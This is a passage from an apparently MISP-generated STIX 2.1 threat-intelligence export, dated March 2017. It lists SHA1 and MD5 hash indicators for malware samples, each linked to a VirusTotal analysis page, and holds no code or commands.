"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db802d-ddf8-4acf-b71e-4f8002de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db802d-ddf8-4acf-b71e-4f8002de0b81",
|
|
"value": "https://www.virustotal.com/file/0a31bfdc22ff3cea5a160b2c32a98764027be7512ced50825d1be0b93a7e7aa4/analysis/1428491013/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db802e-a1ac-4904-9d81-48a302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:46.000Z",
|
|
"modified": "2017-03-29T09:36:46.000Z",
|
|
"description": "sample - Xchecked via VT: fa91599afa18eff9735b0c0328c8cb0fc305f8d924ebb36a609e50e4a6ab256c",
|
|
"pattern": "[file:hashes.SHA1 = '8ebe14491acd03a54625841c5babb98f183d48ff']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:36:46Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db802f-f2c4-433a-b2bb-4cda02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:47.000Z",
|
|
"modified": "2017-03-29T09:36:47.000Z",
|
|
"description": "sample - Xchecked via VT: fa91599afa18eff9735b0c0328c8cb0fc305f8d924ebb36a609e50e4a6ab256c",
|
|
"pattern": "[file:hashes.MD5 = '8cfab5836a05abe007bfb000302cb470']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:36:47Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8030-7a04-42bc-9bed-414802de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:48.000Z",
|
|
"modified": "2017-03-29T09:36:48.000Z",
|
|
"first_observed": "2017-03-29T09:36:48Z",
|
|
"last_observed": "2017-03-29T09:36:48Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8030-7a04-42bc-9bed-414802de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8030-7a04-42bc-9bed-414802de0b81",
|
|
"value": "https://www.virustotal.com/file/fa91599afa18eff9735b0c0328c8cb0fc305f8d924ebb36a609e50e4a6ab256c/analysis/1461049409/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8031-a760-4ca4-880e-4b8302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:49.000Z",
|
|
"modified": "2017-03-29T09:36:49.000Z",
|
|
"description": "sample - Xchecked via VT: b2a2d63c68fce4d4bfddd4fd8584b6c638ee26664785df436c48ffa16e177893",
|
|
"pattern": "[file:hashes.SHA1 = '5a46a25eaae46bc14df217bc17b2d38b5fd65ea5']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:36:49Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8032-dfb4-4170-a4b5-421e02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:50.000Z",
|
|
"modified": "2017-03-29T09:36:50.000Z",
|
|
"description": "sample - Xchecked via VT: b2a2d63c68fce4d4bfddd4fd8584b6c638ee26664785df436c48ffa16e177893",
|
|
"pattern": "[file:hashes.MD5 = '71bf3b5fee69a339a5882d97a2607e7b']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:36:50Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8033-d088-48cf-964f-457502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:51.000Z",
|
|
"modified": "2017-03-29T09:36:51.000Z",
|
|
"first_observed": "2017-03-29T09:36:51Z",
|
|
"last_observed": "2017-03-29T09:36:51Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8033-d088-48cf-964f-457502de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8033-d088-48cf-964f-457502de0b81",
|
|
"value": "https://www.virustotal.com/file/b2a2d63c68fce4d4bfddd4fd8584b6c638ee26664785df436c48ffa16e177893/analysis/1446023542/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8034-d5e8-4b71-b1e0-438102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:52.000Z",
|
|
"modified": "2017-03-29T09:36:52.000Z",
|
|
"description": "sample - Xchecked via VT: 5e139ca25b1519cc28a8096cb28d2be69f57b1af037674a81902f9c605777543",
|
|
"pattern": "[file:hashes.SHA1 = 'a1e2f1ddb9d7bd5fd2f6be6fc405be24c4fd7e75']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:36:52Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8034-bccc-4bf2-8ba9-4ccf02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:52.000Z",
|
|
"modified": "2017-03-29T09:36:52.000Z",
|
|
"description": "sample - Xchecked via VT: 5e139ca25b1519cc28a8096cb28d2be69f57b1af037674a81902f9c605777543",
|
|
"pattern": "[file:hashes.MD5 = 'cacb33bbafaceb04be5729685740950b']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:36:52Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8035-edfc-4730-b291-46e702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:53.000Z",
|
|
"modified": "2017-03-29T09:36:53.000Z",
|
|
"first_observed": "2017-03-29T09:36:53Z",
|
|
"last_observed": "2017-03-29T09:36:53Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8035-edfc-4730-b291-46e702de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8035-edfc-4730-b291-46e702de0b81",
|
|
"value": "https://www.virustotal.com/file/5e139ca25b1519cc28a8096cb28d2be69f57b1af037674a81902f9c605777543/analysis/1475963564/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8036-9854-4252-9295-4dd702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:54.000Z",
|
|
"modified": "2017-03-29T09:36:54.000Z",
|
|
"description": "sample - Xchecked via VT: cec7a9270993443ed9cd798a3ac64693195805a410f56468518fa48cf5923876",
|
|
"pattern": "[file:hashes.SHA1 = '80c2bec740b60519d9fb465bc70e00c08c36b38a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:36:54Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8037-68c4-4e49-8e72-477802de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:55.000Z",
|
|
"modified": "2017-03-29T09:36:55.000Z",
|
|
"description": "sample - Xchecked via VT: cec7a9270993443ed9cd798a3ac64693195805a410f56468518fa48cf5923876",
|
|
"pattern": "[file:hashes.MD5 = '6ebc45b11715011380b5659fc10fc824']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:36:55Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8038-a5b4-4728-9545-4f5102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:56.000Z",
|
|
"modified": "2017-03-29T09:36:56.000Z",
|
|
"first_observed": "2017-03-29T09:36:56Z",
|
|
"last_observed": "2017-03-29T09:36:56Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8038-a5b4-4728-9545-4f5102de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8038-a5b4-4728-9545-4f5102de0b81",
|
|
"value": "https://www.virustotal.com/file/cec7a9270993443ed9cd798a3ac64693195805a410f56468518fa48cf5923876/analysis/1438845312/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8039-0c50-4461-a66c-405602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:57.000Z",
|
|
"modified": "2017-03-29T09:36:57.000Z",
|
|
"description": "sample - Xchecked via VT: 3cada2c960ec431d0f13edcbee4dcfef1dcbdce0538b511f110cbee2e6470722",
|
|
"pattern": "[file:hashes.SHA1 = '574ff72d543b6e1ddadfad281b2256301bf8f1a1']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:36:57Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db803a-20a4-4061-9a51-409b02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:58.000Z",
|
|
"modified": "2017-03-29T09:36:58.000Z",
|
|
"description": "sample - Xchecked via VT: 3cada2c960ec431d0f13edcbee4dcfef1dcbdce0538b511f110cbee2e6470722",
|
|
"pattern": "[file:hashes.MD5 = 'ccd4ed5929e80a42b80e14c670ccf1c1']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:36:58Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db803b-7b30-4552-a99a-451402de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:59.000Z",
|
|
"modified": "2017-03-29T09:36:59.000Z",
|
|
"first_observed": "2017-03-29T09:36:59Z",
|
|
"last_observed": "2017-03-29T09:36:59Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db803b-7b30-4552-a99a-451402de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db803b-7b30-4552-a99a-451402de0b81",
|
|
"value": "https://www.virustotal.com/file/3cada2c960ec431d0f13edcbee4dcfef1dcbdce0538b511f110cbee2e6470722/analysis/1462823399/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db803c-67fc-4a64-9897-415b02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:00.000Z",
|
|
"modified": "2017-03-29T09:37:00.000Z",
|
|
"description": "sample - Xchecked via VT: 3e30805f1de04950d50d08176c8ac3c2974b42b30913c9aa11693d1a0e34b98a",
|
|
"pattern": "[file:hashes.SHA1 = '2f586b04833bd594e01215103233e9e9db853fc3']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:37:00Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db803d-9178-4a94-99d8-4c5202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:01.000Z",
|
|
"modified": "2017-03-29T09:37:01.000Z",
|
|
"description": "sample - Xchecked via VT: 3e30805f1de04950d50d08176c8ac3c2974b42b30913c9aa11693d1a0e34b98a",
|
|
"pattern": "[file:hashes.MD5 = '32ab47e121fc2efcc73d58c5c226a1bd']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:37:01Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db803e-1bb8-40dd-8779-41a102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:02.000Z",
|
|
"modified": "2017-03-29T09:37:02.000Z",
|
|
"first_observed": "2017-03-29T09:37:02Z",
|
|
"last_observed": "2017-03-29T09:37:02Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db803e-1bb8-40dd-8779-41a102de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db803e-1bb8-40dd-8779-41a102de0b81",
|
|
"value": "https://www.virustotal.com/file/3e30805f1de04950d50d08176c8ac3c2974b42b30913c9aa11693d1a0e34b98a/analysis/1460728348/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db803f-532c-4b5a-91e3-4bad02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:03.000Z",
|
|
"modified": "2017-03-29T09:37:03.000Z",
|
|
"description": "sample - Xchecked via VT: f3a1fb80a5c79d3735ddc4328b915a4b034526ae96345c9b2465c16582ab54be",
|
|
"pattern": "[file:hashes.SHA1 = 'ba4f86a7f7d4a09c938600f057be58eaa8b9f425']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:37:03Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8040-35a8-4caf-a4e6-4fed02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:04.000Z",
|
|
"modified": "2017-03-29T09:37:04.000Z",
|
|
"description": "sample - Xchecked via VT: f3a1fb80a5c79d3735ddc4328b915a4b034526ae96345c9b2465c16582ab54be",
|
|
"pattern": "[file:hashes.MD5 = '555363ddd1dc30b1f1dc2399fc404a5c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:37:04Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8041-cfac-4b45-9947-487e02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:05.000Z",
|
|
"modified": "2017-03-29T09:37:05.000Z",
|
|
"first_observed": "2017-03-29T09:37:05Z",
|
|
"last_observed": "2017-03-29T09:37:05Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8041-cfac-4b45-9947-487e02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8041-cfac-4b45-9947-487e02de0b81",
|
|
"value": "https://www.virustotal.com/file/f3a1fb80a5c79d3735ddc4328b915a4b034526ae96345c9b2465c16582ab54be/analysis/1464075152/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8042-52d0-4e42-bc23-4cbf02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:06.000Z",
|
|
"modified": "2017-03-29T09:37:06.000Z",
|
|
"description": "sample - Xchecked via VT: 93369c703becbc0bb9960fb55b7d61ae733638e1e6eab10336faf8ce877925f6",
|
|
"pattern": "[file:hashes.SHA1 = 'afbf5462798c7c260b7c6bd463e4860ee639afaa']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:37:06Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8043-225c-4367-9a90-408402de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:07.000Z",
|
|
"modified": "2017-03-29T09:37:07.000Z",
|
|
"description": "sample - Xchecked via VT: 93369c703becbc0bb9960fb55b7d61ae733638e1e6eab10336faf8ce877925f6",
|
|
"pattern": "[file:hashes.MD5 = 'bc49c3a381b733a0147687adb0d98c9b']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:37:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8044-47c0-42a2-b52e-4d1d02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:08.000Z",
|
|
"modified": "2017-03-29T09:37:08.000Z",
|
|
"first_observed": "2017-03-29T09:37:08Z",
|
|
"last_observed": "2017-03-29T09:37:08Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8044-47c0-42a2-b52e-4d1d02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8044-47c0-42a2-b52e-4d1d02de0b81",
|
|
"value": "https://www.virustotal.com/file/93369c703becbc0bb9960fb55b7d61ae733638e1e6eab10336faf8ce877925f6/analysis/1486124586/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8045-00e8-4966-b0ff-4c5702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:09.000Z",
|
|
"modified": "2017-03-29T09:37:09.000Z",
|
|
"description": "sample - Xchecked via VT: cbb7c2fedc753f62fa1bf47f2e0c6aa487eecfd27d867789764dbde97a8b9449",
|
|
"pattern": "[file:hashes.SHA1 = '879dad113a572ebae9022eecc84c5cae0495d800']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:37:09Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8046-d1ac-49d8-8b23-40fc02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:10.000Z",
|
|
"modified": "2017-03-29T09:37:10.000Z",
|
|
"description": "sample - Xchecked via VT: cbb7c2fedc753f62fa1bf47f2e0c6aa487eecfd27d867789764dbde97a8b9449",
|
|
"pattern": "[file:hashes.MD5 = 'd03eb7fb350abc68de35fa9dc6cd22aa']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:37:10Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8047-c67c-4e58-b1ff-4e7902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:11.000Z",
|
|
"modified": "2017-03-29T09:37:11.000Z",
|
|
"first_observed": "2017-03-29T09:37:11Z",
|
|
"last_observed": "2017-03-29T09:37:11Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8047-c67c-4e58-b1ff-4e7902de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8047-c67c-4e58-b1ff-4e7902de0b81",
|
|
"value": "https://www.virustotal.com/file/cbb7c2fedc753f62fa1bf47f2e0c6aa487eecfd27d867789764dbde97a8b9449/analysis/1464082675/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8048-4798-4182-bf01-4a9002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:12.000Z",
|
|
"modified": "2017-03-29T09:37:12.000Z",
|
|
"description": "sample - Xchecked via VT: 023f81fd3a34ef94c9fd6928304426929672d4c7e9c98e60b631cbd2e2a56731",
|
|
"pattern": "[file:hashes.SHA1 = '78bbd12c11009ba32c6588d523b0e877c6ea4fb0']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:37:12Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8049-600c-45d2-99dd-4d9c02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:13.000Z",
|
|
"modified": "2017-03-29T09:37:13.000Z",
|
|
"description": "sample - Xchecked via VT: 023f81fd3a34ef94c9fd6928304426929672d4c7e9c98e60b631cbd2e2a56731",
|
|
"pattern": "[file:hashes.MD5 = '65b1c20f3b90546df26e8a500c991a85']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:37:13Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db804a-7c40-49de-b982-4d0102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:14.000Z",
|
|
"modified": "2017-03-29T09:37:14.000Z",
|
|
"first_observed": "2017-03-29T09:37:14Z",
|
|
"last_observed": "2017-03-29T09:37:14Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
